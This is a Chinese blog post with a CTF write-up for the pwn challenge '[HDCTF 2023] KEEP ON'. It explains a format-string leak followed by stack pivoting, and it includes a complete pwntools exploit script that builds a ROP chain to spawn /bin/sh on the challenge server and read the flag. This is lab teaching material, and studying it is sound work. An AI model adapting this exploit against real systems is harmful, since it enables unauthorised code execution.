栈迁移([HDCTF 2023]KEEP ON)

最新推荐文章于 2024-07-19 14:02:42 发布
最新推荐文章于 2024-07-19 14:02:42 发布
阅读量570 收藏 11
点赞数 7
分类专栏: pwn 文章标签: 笔记 pwn 栈迁移
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/139388980
版权

栈迁移

[HDCTF 2023]KEEP ON | NSSCTF

  1. 题目给了一个格式化字符串的漏洞,和一个栈溢出漏洞,但是栈溢出的位置有限,只能溢出到返回值的位置,这样构造的ROP链不能完全写入到栈上,需要进行栈迁移:

    image-20240602110426187

  2. 确定栈迁移的目标位置:输入数组s的首地址,首先利用而格式化字符串泄漏bp寄存器指向的栈上的数据(是函数调用者即vuln的栈低指针),根据该值可以确定与s首地址的偏移x,从而用 泄漏的数据-x 来覆盖bp处的值, 泄漏的数据-x 处即为新的栈空间。

    • 调试确定 格式化字符串泄漏数据的位置bp处值与s的偏移量 ,可以看到bp寄存器指向的位置在输出字符串中的 第16个 ,s的首地址(0x7fffffffddb0)与泄漏的值(0x7fffffffde10)之间的距离相差 0x60

      image-20240602111522724

      image-20240602111726331

  3. EXP,其中 target+40 是我们输入字符串 b’/bin/sh’ 的地址,要放在 pop_rdi_ret 传参:

    from pwn import *    
context(os='linux', arch='amd64', log_level='debug')
p=remote('node4.anna.nssctf.cn',28697)

#ROPgadget获取一些必要指令的地址
leave_ret = 0x4007f2	#栈迁移使用
pop_rdi_ret = 0x4008d3	#传参使用
ret_addr = 0x4005b9		#栈平衡使用
sys_addr = 0x4005E0		#挟制ip使用
p.recvuntil(b'please show me your name: \n')

#泄漏地址
payload = b'%16$p'
p.sendline(payload)
p.recvuntil(b'hello,')
target = eval(p.recv(14).decode())
print(hex(target))
p.recvuntil(b'keep on !\n')

#计算栈迁移后的首地址
target = target - 0x60
payload = (b'aaaaaaaa'+p64(ret_addr)+p64(pop_rdi_ret)+p64(target+40)+p64(sys_addr)+b'/bin/sh').ljust(0x50,b'\x00')+p64(target)+p64(leave_ret)
p.sendline(payload)
p.sendline(b'cat flag.txt')
p.interactive()

    image-20240602112336358

波克比QWQ
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HDCTF 2023 复现
weixin_63231007的博客
07-11 931
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 迁移&格式化字符串 crypto RSA
某不知名ctfer选手的第一周周报
2303_79366759的博客
04-22 910
不知道你们是不是有时候会遇到这种情况,你们可能是想对%6$p对应的地方写值,但是这个它是对指针进行操作的,那么%6$p对应的地方,也就是rsp对应的地方它的值是0x1,可能我们的意是想把通过%255c%6$n把0x1改成我们需要的值,但是格式化字符串会把0x1解析为一个地址,那么我们对0x1这个地址写值,当然会不可避免的出错,所以我们要想办法把一个指针指向rsp的位置,那么就可以对rsp保存的指针保存里面的值进行修改了。直接让我们的编译器模拟环境,然后就可以通过c语言代码模拟生成的v5的值,就可以了。
HDCTF KEEP ON
红叶的博客
04-26 675
我们将Payload填充到0x50大小,因为0x50是s的大小。剩下的0x10则是我们的RBP与Leave, Return指令。然后就是我们的/bin/sh地址。rbp与s的距离为0x60,再减去0x08的返回地址,就得到了我们的目标迁移地址。我们首先将binsh的地址送入rdi寄存器中,然后再继续接下来的操作。这样我们就得到了我们的目标地址,可以开始构建我们的Payload了。来将/bin/sh的地址pop进中作为system函数的参数。我们只有0x60的大小构建Payload。
HDCTF2023 WP
m0_68757308的博客
04-23 1163
HDCTF2023 WP
2023HDCTF部分wp(pwn3,web1,crypto3,Misc1)
qq_51627915的博客
04-23 964
HDCTF部分wp,指我a出来的
HDCTF 2023 Pwn WriteUp
红叶的博客
04-23 803
本人是菜狗,比赛的时候只做出来1题,2题有思路但是不会,还是太菜了。迁移还是不会,但又都是迁移的题,真头大。得找时间好好学学。
SAP on AWS 迁移方法
07-10
AWS官方的规范指南:SAP on AWS 迁移方法
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
Ruby on Rails迁移时的一些注意事项
09-21
在Ruby on Rails框架中,数据库迁移是开发过程中不可或缺的一部分,它允许开发者在不丢失数据的情况下对数据库结构进行修改。以下是一些在进行Ruby on Rails迁移时需要注意的关键点,以确保过程顺利且不会对现有数据...
跨林ADMT迁移文件说明
06-28
跨林ADMT(Active Directory Migration Tool)迁移是一个复杂的过程,用于将一个林中的对象(如用户、组、计算机等)安全地迁移到另一个林。在这个过程中,重要的是要确保数据的完整性,同时建立和维护两个林之间的...
防御笔记第七天(时需更新)
weixin_63264424的博客
07-16 763
HRP在进行双机热备时,还有一个要求,两台热设备之间,必须拥有一条链路,用来同步信息,并且,这条链路必须是三层链路---这两条路在进行数据传输时,不受安全策略的影响,(注意,如果心跳线是直连的,则不受安全策略的影响,但是中间有中继设备,即非直连场景,则需要配置安全策略)----心跳线----VGMP发送的报文也是通过心跳线传输的。配置信息---(接口IP地址,路由地址)-----hrp不能同步基本的接口和路由信息,安全策略和NAT策略……状态信息-----会话表,server-map,黑名单和白名单等等。
VSCODE驯服笔记(一)
敲代码的狸花猫
07-15 256
点击左下角的齿轮图标,然后选择 “Settings”。或者使用快捷键 Ctrl + ,(Windows/Linux)或 Cmd + ,(macOS)。
node模块加载及第三方包(学习笔记
oopsboom的博客
07-16 586
gulp是什么? 基于node平台开发的前端构建工具 将机械化操作编写成任务, 想要执行机械化操作时执行一个命令行命令任务就能自动执行了 用机器代替手工,提高开发效率。 能做什么? 项目上线,HTML、CSS、JS文件压缩合并 语法转换(es6、less …) 公共文件抽离 修改文件浏览器自动刷新 Gulp使用 1.使用npm install gulp下载gulp库文件 2.在项目根目录下建立gulpfile.js文件(只能是这个文件) 3.重构项目的文件夹结构 src目录放置源代码文件 dist目录放置构
NestJS笔记
m0_65519288的博客
07-16 606
概述:本篇文章是NestJS笔记,包括了Nest的基本使用、连接数据库、日志操作。
AGV栅格地图与QImage图片转换笔记
Pou光明的博客
07-15 309
最近在加班加点处理一个agv相关的任务,印象比较深的是将agv给的json数据转换为一个图片。最终的简化需求是将某坐标系下的二维点数据转换为一张图片的像素。Ok,首先的问题是如何将二维的数据映射到栅格坐标系。先看数据例子:"mapType":"2D-Map","maxPos":{"x":4.51,"y":16.331},"minPos":{"x":-14.138,"y":-1.48} "resol...
cs224w笔记(p5)
最新发布
m0_51118873的博客
07-19 303
它特别关注两个节点共有的邻居节点,并给予那些在网络中不太常见的共有邻居更高的权重,而对于那些更常见的共有邻居则给予较低的权重。其中,Γ(𝑢)Γ(u) 表示节点 𝑢u 的邻居节点集合,Γ(𝑣)Γ(v) 表示节点 𝑣v 的邻居节点集合,Γ(𝑢)∩Γ(𝑣)Γ(u)∩Γ(v) 表示 𝑢u 和 𝑣v 的共有邻居节点集合。其中,𝐴A 和 𝐵B 分别代表两个集合,∣𝐴∩𝐵∣∣A∩B∣ 表示集合 𝐴A 与 𝐵B 的交集元素的数量,而 ∣𝐴∪𝐵∣∣A∪B∣ 表示集合 𝐴A 与 𝐵B 的并集元素的数量。
STM32学习和实践笔记(40):DS18B20温度传感器实验
qq_37191547的博客
07-15 826
DS18B20温度传感器的内部存储器包括一个高速的暂存器RAM和一个非易失性的可电擦除的EEPROM,后者存放高温度和低温度触发器TH、TL和配置寄存器。60~240 us,以产生低电平应答脉冲。单总线器件仅在主机发出读时序时,才向主机传输数据,所以,在主机发出读数据命令后,必须马上产生读时序,以便从机能够传输数据。比如我们要计算+85度,数据输出十六进制是0X0550,因为高字节的高5位为0,表明检测的温度是正温度,接着主机释放总线,外部的上拉电阻将单总线拉高,延时 15~60 us,并进入接收模式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值